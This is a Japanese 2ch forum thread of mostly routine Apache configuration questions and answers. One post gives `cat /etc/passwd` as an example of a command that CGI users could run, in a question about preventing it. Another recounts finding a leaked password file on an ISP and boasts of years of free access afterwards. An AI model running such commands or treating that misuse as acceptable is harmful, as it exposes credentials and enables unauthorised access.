Apache関連 Part11at UNIX
Apache関連 Part11 - 暇つぶし2ch300:名無しさん@お腹いっぱい。
09/11/02 15:50:41
誤ってhttpd.confを削除してしまいました(専用レン鯖)。
現在apacheは起動していますが、
何らかで再起動の必要が生じるまでになんとかせねば…。
非常に焦っています。

現在読み込まれているhttpd.confの内容を把握する方法はありませんか?

301:名無しさん@お腹いっぱい。
09/11/02 21:17:16
mod_infoが有効だったらそれを見て書き写す
有効じゃなかったら…俺には思い浮かばないな

302:名無しさん@お腹いっぱい。
09/11/04 02:20:56
>>301
当事者じゃないが、たしかにそれ使えるな。
Thx!

303:名無しさん@お腹いっぱい。
09/11/04 10:53:50
バックアップ無しのレンサバ?
それなら、諦めて次善策考えた方が良い。

304:名無しさん@お腹いっぱい。
09/11/05 00:57:47
Apache(VirtualHost)とTomcatをmod_jkで連携しています。
Tomcatでエラー発生時に、Tomcat側で設定しているエラーページを
表示したいのですが、Apacheのデフォルトのエラードキュメントが表示されてしまいます。
(「Additionally, a xxx error was encountered
while trying to use an ErrorDocument to handle the request」というやつ)

・ErrorDocumentディレクティブは設定していない
・Tomcatからはエラーページが返っている(mod_jk.logのダンプで確認)
・しかし上の直後に"No body with status=xxx for worker=workerx"と出力されている
 →エラーページがbodyとして返ってきているのに何故???
・Tomcatのエラーページの拡張子を.varにするとちゃんとTomcat側のエラーページが表示できる

何故こうなるのか思い当たる点がある方、いらっしゃいませんでしょうか。



305:名無しさん@お腹いっぱい。
09/11/07 19:22:49
>>300
lsofでinode追ってなかったことにするとか
URLリンク(www.itmedia.co.jp)


306:名無しさん@お腹いっぱい。
09/11/07 23:41:45
Linuxの場合そんなことが出来るのか
俺はFreeBSDだけどprocファイルシステム有効にしよっかな

307:名無しさん@お腹いっぱい。
09/11/08 07:54:22
>>306
FreeBSDのprocでは >>305 のようなことはできません。

308:名無しさん@お腹いっぱい。
09/11/08 11:04:33
inodeがわかれば何とかなるのかな。

309:名無しさん@お腹いっぱい。
09/11/09 03:20:37
Apacheはhttpd.conf開きっぱなしにしないような。

310:名無しさん@お腹いっぱい。
09/11/14 00:27:40
質問です。特定のipからのアクセスは、robots.txt以外全て拒否しようとして以下のように書きましたが、robots.txtを含めてアクセスを遮断してしまいます。
どこが悪いんでしょうか?

<Location />
Order Allow,Deny
Allow from all
Deny from 1.1.1.1
</Location>

<Files robots.txt>
Order Deny,Allow
Allow from all
</Files>


311:名無しさん@お腹いっぱい。
09/11/14 00:32:09
>>310
URLリンク(httpd.apache.org)

312:名無しさん@お腹いっぱい。
09/11/14 00:34:59
IPってゆうな。クズ。

313:名無しさん@お腹いっぱい。
09/11/14 05:26:50
>>312
IPv6からしかアクセスできないようにしたいのかもしれないだろ。

314:名無しさん@お腹いっぱい。
09/11/14 08:46:43
ipって略したらIPv4、ってこともないわけだが。

315:名無しさん@お腹いっぱい。
09/11/14 08:49:22
ip(小文字)っていうのは、iprouteというソフトに入ってるコマンド。
iprouteでのアクセスを遮断したい、という質問だろ。

316:名無しさん@お腹いっぱい。
09/11/14 09:52:05
>>314
もちろん。IPv4だけにしたいのかもしれない。当人に聞いてみろ。

317:名無しさん@お腹いっぱい。
09/11/18 03:23:16
IPv9で使いたいのかもしれん
移植がんばれ

318:名無しさん@お腹いっぱい。
09/11/28 13:07:02
Apache 1.3でSSIを使うために
AddType text/x-server-parsed-html .html
を追加したのですが、すると
URLリンク(www.mysite.com)
でindex.htmlにアクセスしたとき、ファイルを保存のダイアログが出てしまいます。
(IE6.0です)
なにか回避方法はないでしょうか?

319:名無しさん@お腹いっぱい。
09/11/28 13:08:53
>>318
アクセスしてみたけどダイアログ出なかったよ?

320:名無しさん@お腹いっぱい。
09/12/02 06:16:35
現在、httpd.confで、以下のように、アクセス禁止をしています。
<Directory "/home/">
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Directory>

しかしこれだと、JPGなどの画像ファイルにはアクセスされてしまいます。
これを、画像ファイルだけ遮断させて、HTMLは表示させるということはできないでしょうか?

<Files ~ "\.(gif|png|jpg)$
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これを試してみましたが、機能しませんでした。

321:320
09/12/02 06:59:47
<Files ~ "\.(gif|jpe?g|png)$">
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これにしたらいけました
お騒がせしてすいません

322:名無しさん@お腹いっぱい。
09/12/04 17:49:51
wrowe、何やってんの?wrowe。

323:名無しさん@お腹いっぱい。
09/12/07 12:05:33
Apache License 2.0ライセンスのjar(改編なし)を梱包した商用製品をリリースする場合についてですが、
ライセンス翻訳には「要求するのは、ユーザーがそのソフトウェアに Apache License のコードが使われていることを知らせる文言を入れることだけである」
とあり、使用ライブラリ名の明記までは書かれていないので、
複数使用していても、
製品マニュアルに「Apache License 2.0のライブラリを使用しています。」と、載せておけばよいのでしょうか?
翻訳だけではライセンスの満たし方がわかりにくいので、その辺わかりやすく解説しているサイト等もありましたら、
教えていただけないでしょうか?

324:名無しさん@お腹いっぱい。
09/12/14 12:44:44
急な質問で申し訳ないのですが。
わたしのサーバで、/var/www/htmlのWEB公開用ディレクトリにconfが置いてあるみたいなのですが、大丈夫でしょうか。
confにはifcfg-eth0など、ネットワーク関連の設定ファイルが入っています。
このディレクトリにconfをおいた覚えはないのですが、何かのバグですか?
もしくはクラッキングされてしまったのでしょうか。

OSはCentOS5.3です。

325:名無しさん@お腹いっぱい。
09/12/14 13:18:02
何言ってんの。

326:名無しさん@お腹いっぱい。
09/12/14 13:27:46
>>325以外に返す言葉が見つからない

327:名無しさん@お腹いっぱい。
09/12/19 12:20:18
>>324 そのマシンも、あんたも、多分、大丈夫ではない。

328:名無しさん@お腹いっぱい。
09/12/24 21:19:46
>>324
それで思い出した。
もう10年以上も前だけど、むかしベッコアメってプロバイダがあってね
そのホームページスペースに自分がアップロードした覚えのないファイルが突如出現したりしてたんだ
ファイル名はcoreなんだけど、当時はcoreの意味がわからなくて、気味悪いからとりあえずFTPでダウンロードしてHEXDUMPしてみたら
中身が/etc/passwordでひっくり返ったことがあった。
サポートに電話してもよくわかないというから、じゃあ自分の持ち物扱いなんだなということで
まぁ、あまりヘンな自慢はできないしアレだけど、その日から数年間ネットの通信料はタダで生活できました。

329:名無しさん@お腹いっぱい。
09/12/24 23:21:48
10年前と言うことは、不正アクセス禁止法成立前か?

330:名無しさん@お腹いっぱい。
09/12/25 01:03:03
>>329
父性にアクセスしてない気もするが(w


331:名無しさん@お腹いっぱい。
10/01/06 07:15:59
板違いではあるのですが、Windows XP Professional SP2で、
apache2.2を動かしていて、perl v5.10.0でプログラムを書いていますがうまく動きません。

具体的には、
URLリンク(www.stackasterisk.jp)
に書いてある★Dにsleep 10;を書くと、すぐにブラウザが開放されず、
10秒ほど読み込み中の状態になります。

Windowsを使っているのが悪いのでしょうか?
UNIX板の皆さんの意見をお聞かせ下さい。



332:名無しさん@お腹いっぱい。
10/01/06 08:03:30
>>331
板違い。
URLリンク(pc11.2ch.net)

333:名無しさん@お腹いっぱい。
10/01/06 09:01:08
>>332
ご指摘どうもです。そちらの板の
perlスレで聞くことにしました。

334:名無しさん@お腹いっぱい。
10/01/20 22:43:02
前々から聞きたいなと思っていたのですが、アクセスログを見ていると、
時々リファラに複数のURIが併記されたものがあります。例えば今さっき来たヤツですが、
URLリンク(yellowinphotograph.net)
URLリンク(www.stephenblog.com)
URLリンク(210.24.175.20:880)
URLリンク(astinweddingordinators.com)
URLリンク(sumissionword.com) URLリンク(www.mah.on.ca)
URLリンク(www.doctorconsult.com.ar)
URLリンク(bridsmajor.blog128.fc2.com) URLリンク(austincar.co.cc)
URLリンク(travelguide.blog.com)
URLリンク(travelguide.blog.com)
URLリンク(ho.hoorku.com)
URLリンク(job.co.cc)
みたいな具合。これは一体何なんですか?
## 上記のすべての URI は、実際のログから取得した文字列に手を入れてあります。
## また長過ぎる行があると言われて跳ねられるので URI の区切れ目で改行しています。

335:名無しさん@お腹いっぱい。
10/01/20 23:15:18
特定のWikiを狙い撃ちしてる

336:名無しさん@お腹いっぱい。
10/01/21 00:00:28
Webサイト管理者への宣伝なんじゃねーの?

337:名無しさん@お腹いっぱい。
10/01/21 03:34:30
自動でリファラ表示するサイト向けの宣伝、とか。
いずれにせよあんまり気にしてもしょうがないと思う。

338:名無しさん@お腹いっぱい。
10/01/21 06:43:52
うちだと複数のURLがつながってるのは無いけど、どっかのアフィブログのURLがくっついてるのはよくあるな

339:名無しさん@お腹いっぱい。
10/01/21 08:47:11
SEO?


340:名無しさん@お腹いっぱい。
10/01/21 09:43:51
>>339
SEOとは何を略した言葉で何を意味するのかわかっていれば
そんなことは言えないと思うんだ

341:名無しさん@お腹いっぱい。
10/01/21 13:11:38
2ch型の掲示板みたいなの(というか主にlog置場)を作りたいんですが、
cgi-binの下に dat/ と subject.txt を置くと error.log に

attempt to invoke directory as script: C:/xampp/cgi-bin/○○○/

と出てしまいますが、httpd.conf の書き方が間違っているんでしょうか?
それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
教えてください。

342:341
10/01/21 13:24:29
ここ↓みたいな感じにできればいいなと思っているんですが。
URLリンク(navi2ch.sourceforge.net)

343:341
10/01/21 13:28:13
書き忘れました。 httpd.confにはこう書ました。

<Directory c:/xampp/cgi-bin/○○○/>
Options Indexes
Order allow,deny
Allow from all
</Directory>



344:名無しさん@お腹いっぱい。
10/01/21 13:31:15
>>342
これは単にファイルが置いてあるだけだよ。
CGIとか関係ない。

345:名無しさん@お腹いっぱい。
10/01/21 13:33:16
>>341
> それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
はい。

346:341
10/01/21 13:40:11
>>344
それは分っているのですが、ファイル収集のためにcgiを書ました。
>>345
そうなんんですか!? 2chもてっきりそうなってると思ってたんですが、
よくみると2chのスレのURLにはcgi-binって入ってませんね。。。
monazilla とかで2chがどうなっているか聞いたほうがいいんでしょうか。

347:名無しさん@お腹いっぱい。
10/01/21 13:44:59
>>346
2chでも
URLリンク(pc12.2ch.net)
URLリンク(pc12.2ch.net)
とかはただ置いてあるだけ。
CGIは経由していない。

ファイル収集はまた別の話。区別しろ。

348:341
10/01/21 13:54:28
>>347
なるほど。考えなおします。ありがとうございました。

349:341
10/01/21 16:49:48
御陰さまでJaneとLive2chで読み込めるのを確認できました。
どうもありがとうございました。

350:334
10/01/22 01:42:03
>>335-338 ご意見をありがとうございます。
もしかしたら、と思って自分の blog で弾かれている trackback のリストと apache のログを照合すると、
そのまんまピッタリでした。というわけで、なんかトラックバック・スパム?みたいなもののようです。
実害は無いので無視しておくことにします。

351:名無しさん@お腹いっぱい。
10/01/28 17:37:41
FreeBSD(fsdb使えれば)はinodeわかればln(fdsbのコマンド)できる。
zfsでのサルベージ方法教えろ。

352:名無しさん@お腹いっぱい。
10/01/28 19:50:45
頭お菓子な人が来たー

353:名無しさん@お腹いっぱい。
10/02/02 03:27:25
まさにスイーツ(笑)

354:名無しさん@お腹いっぱい。
10/02/26 18:40:21
すみません。
起動中のApacheのMPMがPreforkかWorkerかのどちらであるか調べるコマンドありますか?
Apache 2.0系です。


355:名無しさん@お腹いっぱい。
10/02/26 20:43:36
>>354
環境がわからないけどこんな感じ
apachectl -V
apache2ctl -V

356:名無しさん@お腹いっぱい。
10/02/27 02:00:21
普通に考えたらそうなんだけど、既に起動中のhttpdが
それと同じバイナリファイルから起動されたものであるの
保証がなかったりするから100%ではないような。

357:名無しさん@お腹いっぱい。
10/02/27 02:31:42
あぁあるかも
最近の鯖はCPUはやくてメモリーもたくさん詰めるから
httpd複数立てたほうが効率的だったりするんだよね
ServerLimitとかMaxClientsの上限低すぎるとおもうなー
動画配信とかで1プロセスあたりコネクトしてる時間が異様に長い子沢山なサーバってどういうMax/Limit設定にしてるんだろ?


358:名無しさん@お腹いっぱい。
10/02/27 13:42:24
>>356
Apache Server Informationとか

359:名無しさん@お腹いっぱい。
10/02/27 14:48:32
リブートできる権限があるならMPMを確認した上でリブートしてしまうのが

360:名無しさん@お腹いっぱい。
10/02/27 14:51:13
.htaccessが使えるならこの辺を組み合わせるとか。
<IfModule mpm_prefork_module>
<IfModule mpm_worker_module>
SetEnvIf

361:名無しさん@お腹いっぱい。
10/02/27 19:00:33
workerかpreforkならpsでスレッド情報まで出すオプション付ければ良いんじゃない?

362:名無しさん@お腹いっぱい。
10/03/01 01:28:32
straceで追いかければ動作の違いから判定できるかな?
あと、TeXとかEmacsみたいに任意のプロセスイメージを実行ファイルに
ダンプしてくれるコマンドがあったから、それでダンプして-Vとか。


363:名無しさん@お腹いっぱい。
10/03/24 19:42:20
BASIC認証で使っていい文字ってどんなの?

364:名無しさん@お腹いっぱい。
10/03/25 04:35:58
>>363
URLリンク(abt-archi.com)
「:」がイリーガルキャラクタ
255文字以下であること
あと、AuthName は文字コードを渡せないから日本語だとブラウザによって文字化けする

365:名無しさん@お腹いっぱい。
10/04/05 09:40:25
/var/log/httpdを見ていて気づいたのですが、
ログファイルのオーナーがrootになっています。
User apache
Group apache
として、デーモンはapacheユーザで走らせているのに関わらずです。
何故このような動作をするのでしょうか?


366:名無しさん@お腹いっぱい。
10/04/05 10:50:12
親プロセスがrootだから。

367:名無しさん@お腹いっぱい。
10/04/09 16:36:25
CGIプログラムを作ってて、今までは家のテストサーバーで動かしてたのですが、
だいぶバグも取れてきたので、VPSを借りて公開してみようかと思っています。

そこで質問なんですが、公開する場合、やはりApacheの設定とかってかなり
セキュリティを意識してやらないといけないでしょうか?
家のテストサーバーはCentOSの入門書に書いてあった通り、とりあえずCGIを
使えるように設定しただけなんですが、この程度の知識でVPSでCGIプログラム
を公開するのは無謀ですか?

またお勧めのサイトや書籍等も教えてください。 よろ

368:名無しさん@お腹いっぱい。
10/04/09 16:41:58
Linuxの話はLinux板で。

369:367
10/04/09 16:48:01
>>368

すみません>>367の質問はApacheの設定についての質問の
つもりなんですが・・・
Linux板にApacheスレが見つからなかったもんで・・・


370:名無しさん@お腹いっぱい。
10/04/09 16:58:13
>>368
「Linuxの話はLinux板で」という返しは年寄りスレで。

371:名無しさん@お腹いっぱい。
10/04/09 16:59:35
>>369
くだ質スレでいいよ。

372:367
10/04/09 17:04:08
>>371

行ってきます

373:名無しさん@お腹いっぱい。
10/04/09 19:57:36
レンタルサーバー 板
URLリンク(pc11.2ch.net)


374:名無しさん@お腹いっぱい。
10/05/09 10:40:41
ファイルには更新日時がつくのですが、ディレクトリにアクセスして、DirectoryIndexにあるデフォルトのhtmlファイルが表示された際に、
更新日時が送られません。
更新日時を送るようにするにはどうしたらよいものでしょうか?

375:名無しさん@お腹いっぱい。
10/06/13 22:55:01
suexecでperlをCGIで動かしてるんですが
`cat /etc/passwd`;とか
system("/usr/bin/foo");
とかユーザがコマンドを実行できないようにするには
どう対処すればいいでしょうか?

376:名無しさん@お腹いっぱい。
10/06/18 04:01:40
パーミッションを700にすればいいんじゃないの

377:名無しさん@お腹いっぱい。
10/06/18 07:15:55
質問です。

友人の鯖で、cssが遅いです。

Fedora12
apache 2.2.15

GET hoge.css
をすると、
?/p?$???E??稟@?@??凄w?1??P狒9??LP ?s??HTTP/1.1 200 OK
Date: Wed, 16 Jun 2010 22:00:12 GMT
Server: Apache/2.2.15

1行目が文字化けの余計なレスポンスが
結局cssは適用されるんだけど、読み込むまでに15秒とか掛かっています。

mime.type と 文字コードの確認はしました。
後考えられる原因は何があるでしょうか?
宜しければ教えて下さい。お願い致します。

378:名無しさん@お腹いっぱい。
10/06/26 18:48:52
こういうURLを
URLリンク(aaaa.net)

のように置き換えるにはどうしたらいいでしょうか?


URLリンク(aaaa.net)

379:名無しさん@お腹いっぱい。
10/07/08 15:33:52
>>378
小学生レベルだな
RewriteRule ^/uploda/img/aaa(.*)\.jpg /uploda/index.php?=$1

380:名無しさん@そうだ選挙に行こう
10/07/10 06:09:14
つーか、そもそもの順序が逆だと思うのは俺だけかなぁ・・・

381:378
10/07/10 06:24:19
>>379
ありがとう!!!

382:名無しさん@そうだ選挙に行こう
10/07/11 09:09:43
>>380
俺も見たとき思ったw

>>378
これ変換前後が逆じゃね?

383:名無しさん@そうだ選挙に行こう
10/07/11 15:04:36
URLリンク(aaaa.net)



URLリンク(aaaa.net)

RewriteRule ^/uploda/img/aaaa(.*)\.jpg /uploda/index.php?=$1

*********************

URLリンク(aaaa.net)



URLリンク(aaaa.net)

RewriteRule ^/uploda/img/index.php?=(.*) /uploda/img/aaaa$1.jpg

かな?


384:名無しさん@そうだ選挙に行こう
10/07/11 18:53:17
要求は 989141 であって 98914 ではないんだから、それではうまくいかないのでは?


385:名無しさん@そうだ選挙に行こう
10/07/11 19:00:26
ただの脱字だと思うけどね

386:名無しさん@そうだ選挙に行こう
10/07/11 22:01:42
変換前後が逆だと思ってる香具師は素人

387:名無しさん@お腹いっぱい。
10/07/12 07:29:27
>>378
そろそろ正解を。

388:名無しさん@お腹いっぱい。
10/07/12 09:56:28
>>386
つまり画像ファイルへ直リンされたときはcgi経由のURLに自動的に戻し
アダルト広告を表示させたい、とあなたはそう仰っているわけですね?(キリッ

389:名無しさん@お腹いっぱい。
10/07/12 13:43:18
>>388
わざわざ出てきて、無知な素人だと必死でアピールしなくても良いぞ。
素人は引っ込んでろよ。www

390:名無しさん@お腹いっぱい。
10/07/12 18:33:35
素人はきっと画像ファイルがそこにあるという先入観が取れないんだろうな


391:名無しさん@お腹いっぱい。
10/07/13 22:23:12
RewriteRuleって、Locationセクション内に
書けないんだっけ?
マニュアルだけ見ると、できなさそうな
感じなんだけど…。



392:名無しさん@お腹いっぱい。
10/07/13 22:30:03
書けるけど、書かないほうがいい

393:名無しさん@お腹いっぱい。
10/07/14 13:00:49
>>392
どうして?
書けるなら書こうと思ったんだけど。
サイト別にアクセス制限したくて。


394:名無しさん@お腹いっぱい。
10/07/14 16:23:33
ヒント:
  無限ループ

395:名無しさん@お腹いっぱい。
10/07/14 19:10:59
>>394
もうひとこえ!


396:名無しさん@お腹いっぱい。
10/07/14 19:17:13
ヒント:
  こわくね?

397:名無しさん@お腹いっぱい。
10/07/14 19:25:58
無限ループは発生しないだろ。発生するというなら実例示してよ。

398:名無しさん@お腹いっぱい。
10/07/14 23:33:06
LocationとかDirectory内(ディレクトリコンテキスト)に書くより、
トップレベルとかVirtualHost内(サーバーコンテキスト)に書くほうがはるかに簡単

399:名無しさん@お腹いっぱい。
10/07/20 01:02:03
apache3て何がいいの?
今は2.2を使ってるけど

400:名無しさん@お腹いっぱい。
10/07/20 12:46:26
あれ、2.4のために開発中の2.3を放置していきなり3?

401:名無しさん@お腹いっぱい。
10/07/21 18:51:48
>>398
そりゃあそうなんだけど。

>サイト別にアクセス制限したくて。
とか書きにくいところが困りもの。
トップレベルとVirtualHostセクションは
一回しか書けないんで、記述の
整理がやりにくい。



402:名無しさん@お腹いっぱい。
10/08/04 23:58:52
Ubuntu 10.04 に apt で Apache2.2 をインストールしました。
そのあと以下を見て viewvc をインストールしました。
URLリンク(d.hatena.ne.jp)

現在、URLリンク(example.jp) とアクセスすると
自分の Subversion リポジトリを見ることが出来ます。

質問:
/cgi-bin/viewvc.cgi にアクセスが来たときだけBasic認証を掛けたい。
/cgi-bin/hoge.cgi など、viewvc.cgi 以外の cgi にアクセスが来たときは、
これまで通り認証は掛けたくない。
これを実現するにはどのように httpd.conf を書けばいいでしょうか?

403:名無しさん@お腹いっぱい。
10/08/05 00:00:22
>>402 の続き:
/etc/apache2/sites-available/default は以下のようになっていて
(apt で apache をインストールした直後)
「ここから追記した」というブロックを追記した後、
URLリンク(example.jp) にアクセスしても認証ダイアログが出ませんでした。

<Directory "/usr/lib/cgi-bin"> のところで AllowOverride None しているから?

<VirtualHost *:80>
 ServerAdmin webmaster@localhost

 DocumentRoot /var/www
 <Directory />
  Options FollowSymLinks
  AllowOverride None
 </Directory>
 <Directory /var/www/>
  Options Indexes FollowSymLinks MultiViews
  AllowOverride None
  Order allow,deny
  allow from all
 </Directory>



404:名無しさん@お腹いっぱい。
10/08/05 00:00:40
>>403 の続き:

 ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
 <Directory "/usr/lib/cgi-bin">
  AllowOverride None
  Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
  Order allow,deny
  Allow from all
 </Directory>                       ←ここまで apt でインストールしたときのままの状態

 <Directory "/usr/lib/cgi-bin/viewvc.cgi">    ←ここから追記した
  AuthType Basic
  AuthName "Subversion Repository"
  AuthUserFile /etc/apache2/hoge.passwd
  require valid-user
 </Directory>


405:名無しさん@お腹いっぱい。
10/08/05 02:55:09
>>404
Files

406:名無しさん@お腹いっぱい。
10/08/28 16:13:56
FreeBSD6.2, Apache1.3.42, PHP5.3, Python2.7にてmod_pythonがsegmentasion Faultで落ちました。

んで、mod_wsgiをインストールしようとしたのですが、Pythonを--without-thread指定しないとコンパイルが通りません。
--without-threadを付けてPythonをインストール後、mod_wsgiをインストールしようとすると、PythonのThredを有効にしてインストールしろと怒られます。

何か解決方法はありますか…?orz

407:名無しさん@お腹いっぱい。
10/08/28 16:28:21
FreeBSD6(ry 査読中止。

408:名無しさん@お腹いっぱい。
10/08/28 18:04:20
もちけつ

409:406
10/08/28 21:14:25
あー、うん。

FreeBSD8.0, Apache2.2.16, PHP5.3, MySQL5.1, Python2.7, mod_wsgi3.3 で動きました。

あー、うん、うん、うん…。orz


410:378
10/09/19 03:41:24
自宅サーバー1台
フレッツ光ネクスト回線1本
ルーターは使わずPPPoEで接続しています。

で今使っているプロバイダ1社
これをもう1社追加して、マルチセクション(URLリンク(www.daifukuya.com))で
自宅サーバーのAフォルダを回線Aに、Bフォルダを回線Bに割り当てしたいのですが、
サーバー側の設定としてどうしたらいいでしょうか?

どうぞよろしくお願いしますm(__)m

411:名無しさん@お腹いっぱい。
10/09/19 07:35:13
セッションとセクションの違いがわかる大人になってから出直してください。

412:410
10/09/19 08:22:56
マルチセッションですね
分かる方いらっしゃいましたらお願いしますm(__)m

413:名無しさん@お腹いっぱい。
10/09/19 08:35:51
>>378
IPベースのバーチャルホストを使う

414:名無しさん@お腹いっぱい。
10/09/19 08:37:20
>>410
apache あんまり関係ない...
OS のポリシールーティング+αや
ブロードバンドルータならNATで
別ポートで動かした apache 2つにつなげればいいんじゃね

415:名無しさん@お腹いっぱい。
10/09/19 08:38:58
OS でPPPoEセッション張ってるならIPベースは確かにいけるね


416:名無しさん@お腹いっぱい。
10/09/19 08:40:38
OS という表現は変だな
サーバマシンでってことで。

ついでに、サーバマシンに2IP ふれば
ルーターかましててもIPベースだけで
ことが足りるのかな

417:名無しさん@お腹いっぱい。
10/09/19 08:53:46
まてよ、PPPoEってことはiPアドレス不定だから設定ファイルにIPアドレスを書けないな。
その辺は工夫が必要だ。たとえばiptableで固定のIPアドレスに転送するとか、
設定ファイルを動的に書き換えるようにするとか。

418:410
10/09/20 13:07:30
皆さんありがとうございます
>>413のいうバーチャルホストで振り分けする方式にしました

419:Perl忍者 ◆M5ZWRnXOj6
10/09/26 17:54:29
mod_perlをubuntu10.01にいれた

... waiting .[Sun Sep 26 17:52:00 2010] [warn] module perl_module is already loaded, skipping

これは読み込まれてるのわかってる
他の場所でよみこまれてる

ここで再読み込みしてる
LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so

<IfModule mod_perl.c>
AddHandler perl-script .cgi
PerlHandler ModPerl::Registry
PerlSendHeader On
</IfModule>


だけど
#LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so
でコメントアウトして

ENVのSERVER_SOFTWAREみても

SERVER_SOFTWARE:Apache/2.2.14 (Ubuntu)
ってだけ
mod_perlってでない 読み込まれてちゃんとロードされてるのにmod_perl
なんでSERVER_SOFTWARE二表示されない おしえて


420:Perl忍者 ◆M5ZWRnXOj6
10/09/26 17:57:24
libapache2-mod-perl2はいれてあるよ

421:名無しさん@お腹いっぱい。
10/09/26 18:39:14
ServerTokens じゃないよなまさか・・?

422:Perl忍者 ◆M5ZWRnXOj6
10/09/26 20:01:11
サーバー友君だった・・・
無駄にわけやがってファイルきもい
conf.d/securityにかかないときかなかった

423:名無しさん@お腹いっぱい。
10/11/14 18:08:47
ログフォーマットについて質問します。
今ログは
isp.example.com - - [14/Nov/2010:18:05:25 +0900] "GET /foo.htm HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
のような形式なのですが、
GET /foo.htm ではなく GET URLリンク(example.net)
のようにドメインまで表示するようにするには
どうすればいいのでしょうか?

424:名無しさん@お腹いっぱい。
10/11/14 23:16:29
>>423
よく嫁
URLリンク(httpd.apache.org)

425:名無しさん@お腹いっぱい。
10/11/15 02:14:16
>>424
ありがとうございます


426:名無しさん@お腹いっぱい。
10/12/15 13:52:06
2.2.17のapr_pstrdupにバグ
apr_pallocが確保したメモリは初期化されていない → memcpy(NULL文字コピーされず)

427:名無しさん@お腹いっぱい。
10/12/15 14:06:33
と思ったけど、NULL文字列までコピーしてたので違ったorz

428:名無しさん@お腹いっぱい。
10/12/17 17:46:15
> NULL文字
これだけで、超初心者とわかるから報告しなくて良いよ。

> NULL文字列
更笑

429:名無しさん@お腹いっぱい。
10/12/19 13:48:05
loadbalancerってapacheのmod_proxy_balancerとipvsadmってどっちがいいの?

430:名無しさん@お腹いっぱい。
10/12/19 14:51:28
>>429
用途が違う

431:名無しさん@お腹いっぱい。
10/12/19 18:26:06
>>430
kwsk

432:名無しさん@お腹いっぱい。
10/12/19 18:31:09
>>431
少しはググれよ

433:名無しさん@お腹いっぱい。
10/12/20 09:27:50
知らないなら黙ってろよ

434:名無しさん@お腹いっぱい。
10/12/21 02:35:23
>>431
レイヤー

435:名無しさん@お腹いっぱい。
10/12/21 04:07:45
適等なことを書き散らかせばいい

436:名無しさん@お腹いっぱい。
10/12/22 05:10:02
mod_proxyとLVSを比較して「どっちがいいの?」というような質問をするということは
冗長化や負荷分散に関してほとんど知識がない人ということだから、推奨するとすればmod_proxyのほうでしょう
もっといえばmod_proxyを使いこなすのは難しいでしょうから、おすすめとしてはpoundです

437:名無しさん@お腹いっぱい。
10/12/22 10:18:51
いや、そういう人へのオススメは「アウトソースしろ」でしょ。


438:名無しさん@お腹いっぱい。
10/12/22 10:25:20
コンサルタントを雇いましょう。

439:名無しさん@お腹いっぱい。
11/01/20 23:46:47
mod_pythonをいれてpythonを動かしいます。
httpd.confで
PythonHandler test
にして、test.pyを動かしているのですが、このようにファイル名をいちいち指定しないで動かすにはどうしたらいいでしょうか?

440:名無しさん@お腹いっぱい。
11/01/21 02:50:34
mod_rewrite

441:名無しさん@お腹いっぱい。
11/01/23 18:47:18
質問です。
Apacheのaccess_logの見方についてですが、以下の304はなんと表現するのが正しいのでしょうか?

xxx.xxx.xxx.xxx - test [23/Jan/2011:18:16:15 +0900] "GET /test.css HTTP/1.1" 304 -

順番に
アクセスしてきた相手のIPアドレス
認証があった場合に使用されたユーザID
アクセスされたサーバ時刻
GETはリクエストヘッダー、GET方式での呼び出し
/test.cssはファイル名、
HTTP/1.1はプロトコルバージョン
304は・・・??

よろしくお願いします。

442:名無しさん@お腹いっぱい。
11/01/23 18:51:47
HTTPステータスコード

443:名無しさん@お腹いっぱい。
11/01/23 18:54:14
もしかして304ってキャッシュ呼び出しですかね?
例えば304のかわりに200で後ろが-でなく数値があれば、リクエスト通って、実際に送出したデータ量(バイト)

という認識でOKですよね。自己解決しました

444:名無しさん@お腹いっぱい。
11/01/23 18:57:13
なぜ規格書(RFC)にあたらないのだ? 死んだ曾々爺さんの遺言か?

445:名無しさん@お腹いっぱい。
11/01/24 11:51:23
遺言のことよくご存知ですね。
そうなんですよ。

446:名無しさん@お腹いっぱい。
11/02/11 12:16:18
grep MSIE access_log | sed -e 's/.*\(MSIE [0-9\.]*\).*/\1/' | sort | uniq -c | sort -rn

447:名無しさん@お腹いっぱい。
11/03/17 18:20:00.70
自宅サーバで動的DNSをしていると
再起動したあとにIPアドレスが変わり名前と違うようになるみたいで
apacheが立ち上がったときに https だけがこけています。(httpはOK)

その後落ち着いてから apache を再起動すると https もうまく起動します。
これを最初から https もこけずに起動できるようにするにはどうすればよいでしょうか。

448:名無しさん@お腹いっぱい。
11/03/17 18:35:59.29
ちょっと sleep してから上げる、とか。

449:名無しさん@お腹いっぱい。
11/03/17 18:37:38.43
pppのリンクアップでrestartとかどーよ?

450:名無しさん@お腹いっぱい。
11/03/17 18:52:24.06
ServerName書くだけで済むんじゃね。

451:名無しさん@お腹いっぱい。
11/03/17 18:53:23.39
IPv4ならNATで内部用固定アドレスに向かわせて
Apacheはその固定アドレス:443をListenさせるとかw

IPv6はどう対処させようか。
サーバなのにtempaddrで運用するってのもアレだけどw

452:名無しさん@お腹いっぱい。
11/03/17 18:54:54.93
笑うほどのことか?

453:447
11/03/17 19:07:02.36
ServerName をかくといけたようです。様々なアイデアありがとうございました!

454:名無しさん@お腹いっぱい。
11/03/24 00:54:18.21

【2ch激論】ダム板が統合・廃止へ!人気スレ「また騙されてダム板に…」がなくなる?
スレリンク(river板)


455:名無しさん@お腹いっぱい。
11/04/23 20:14:19.39
apache 1.3系の頃はBASIC認証の失敗時にも
ログにそのユーザ名が記録されていたんだけど
2.2系に変更したら失敗時は"-"と記録されるようになった。
2.2でも1.3のようにログすることってできないかな?

456:名無しさん@お腹いっぱい。
11/04/25 01:52:04.73
>>455
マジで?そうだとすると、マニュアルに書いてあることが間違ってるね

URLリンク(httpd.apache.org)
>リモートユーザ (認証によるもの。ステータス (%s) が 401 のときは意味がないものである可能性がある)

457:名無しさん@お腹いっぱい。
11/04/25 21:21:40.24
